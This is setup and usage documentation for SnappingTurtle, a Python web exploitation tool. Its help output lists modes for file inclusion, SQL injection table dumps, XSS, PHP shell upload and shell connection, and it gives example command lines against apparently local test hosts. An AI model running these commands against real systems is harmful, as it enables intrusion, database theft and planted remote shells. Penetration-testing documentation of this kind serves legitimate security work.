SnappingTurtle has only one requirement: Python 2.7. Other version may work, but are not officially supported. If Python isn't already installed, the official releases can be found on python.org.
Once Python is installed, SnappingTurtle can be downloaded and run.
SnappingTurtle was designed to be entirely portable, with no explicit setup. To install it, download the latest version from GitHub. Once the latest archive has been downloaded, extract st.py
to the preferred installation directory. For this documentation, st.py
was extracted to c:\tools
on a Windows 10 machine.
Once Python 2.7 has been installed and st.py
extracted, SnappingTurtle can be run.
SnappingTurtle can be run with a command like the following:
C:\tools>python st.py
When run without command-line arguments, SnappingTurtle displays an overview of its settings.
The output should like something like the sample below.
C:\tools>python st.py SnappingTurtle Web Exploitation Tool 0.1.0324.1445 http://autosectools.com/SnappingTurtle python st.py [exploitation strategy] [url] [inputs] # Exploitation Strategies lfi Local file inclusion. Injection is performed using the $lfi token. sqli {options} SQL injection. Injection is performed using the $sqli token. If used, one of two options must be specified: list Dumps a list of databases and tables. table {name} Dumps a database table. xss {server ip} Cross-site scripting. Injection is performed using the $xss token. If used, a target accessible server IP must be specified for listening. upload Arbitrary upload. Write data to the server using the -f option. If used, at least one file must be specified using the -f option. Built-in shells can be injected using the $php token. shell {shell url} Connects to a previously created shell. # Url The url to exploit. Can be injected into using tokens. # Inputs -g {GET name} {GET value} GET data in key/value format. -p {POST name} {POST value} POST data in key/value format. --g {GET data} GET data in Python map format. --p {POST data} POST data in Python map format. -f {name} {filename} {file data} POST data as a file. # Examples python st.py lfi http://localhost/lfiTest.php?theme=$lfi python st.py lfi http://localhost/lfiTest.php -g theme $lfi python st.py lfi http://localhost/lfiTest.php?theme=$lfi%00 python st.py lfi http://localhost/postTest.php --p "{'theme':'$lfi'}" python st.py sqli list http://localhost/sqliTest.php -g email $sqli python st.py sqli table sqlitest.users http://localhost/sqliTest.php -g email $sqli python st.py xss 10.0.0.122 http://10.0.0.145/xss.php -g search $xss python st.py upload http://10.0.0.145/upload.php -f file shell.php $php python st.py shell http://10.0.0.145/shell.php
Now it is time to exploit a target. Head over to Local File Inclusion To Remote Code Execution